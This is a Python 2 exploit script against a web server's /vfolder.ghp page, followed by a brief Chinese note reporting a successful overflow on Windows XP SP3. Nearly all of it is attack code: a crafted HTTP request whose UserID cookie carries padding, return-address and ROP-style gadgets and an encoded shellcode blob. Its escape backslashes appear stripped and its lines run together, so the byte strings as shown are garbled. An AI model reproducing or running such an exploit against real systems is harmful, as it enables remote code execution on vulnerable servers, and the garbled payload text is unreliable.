from struct import pack import socket,sys import os host="192.168.109.129" port=80 junk0 = "x90" * 80 call_edx=pack('<L',0x1001D8C8) junk1="x90" * 396 ppr=pack('<L',0x10010101) crafted_jmp_esp=pack('<L',0xA4523C15) test_bl=pack('<L',0x10010125) kungfu=pack('<L',0x10022aac) kungfu+=pack('<L',0xDEADBEEF) kungfu+=pack('<L',0xDEADBEEF) kungfu+=pack('<L',0x1001a187) kungfu+=pack('<L',0x1002466d) nopsled="x90" * 20 shellcode=("xdaxcaxbbxfdx11xa3xaexd9x74x24xf4x5ax31xc9" + "xb1x33x31x5ax17x83xc2x04x03xa7x02x41x5bxab" + "xcdx0cxa4x53x0ex6fx2cxb6x3fxbdx4axb3x12x71" + "x18x91x9exfax4cx01x14x8ex58x26x9dx25xbfx09" + "x1ex88x7fxc5xdcx8ax03x17x31x6dx3dxd8x44x6c" + "x7ax04xa6x3cxd3x43x15xd1x50x11xa6xd0xb6x1e" + "x96xaaxb3xe0x63x01xbdx30xdbx1exf5xa8x57x78" + "x26xc9xb4x9ax1ax80xb1x69xe8x13x10xa0x11x22" + "x5cx6fx2cx8bx51x71x68x2bx8ax04x82x48x37x1f" + "x51x33xe3xaax44x93x60x0cxadx22xa4xcbx26x28" + "x01x9fx61x2cx94x4cx1ax48x1dx73xcdxd9x65x50" + "xc9x82x3exf9x48x6ex90x06x8axd6x4dxa3xc0xf4" + "x9axd5x8ax92x5dx57xb1xdbx5ex67xbax4bx37x56" + "x31x04x40x67x90x61xbex2dxb9xc3x57xe8x2bx56" + "x3ax0bx86x94x43x88x23x64xb0x90x41x61xfcx16" + "xb9x1bx6dxf3xbdx88x8exd6xddx4fx1dxbax0fxea" + "xa5x59x50") payload=junk0 + call_edx + junk1 + ppr + crafted_jmp_esp + test_bl + kungfu + nopsled + shellcode buf="GET /vfolder.ghp HTTP/1.1 " buf+="User-Agent: Mozilla/4.0 " buf+="Host:" + host + ":" + str(port) + " " buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 " buf+="Accept-Language: en-us " buf+="Accept-Encoding: gzip, deflate " buf+="Referer: http://" + host + "/ " buf+="Cookie: SESSIONID=1337; UserID=" + payload + "; PassWD=; " buf+="Conection: Keep-Alive " print "[*] Connecting to Host " + host + "..." s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect=s.connect((host, port)) print "[*] Connected to " + host + "!" except: print "[!] " + host + " didn't respond " sys.exit(0) print "[*] Sending malformed request..." s.send(buf) print "[!] Exploit has been sent! " s.close()
成功在win xp sp3上溢出
图一 溢出前
图二 溢出后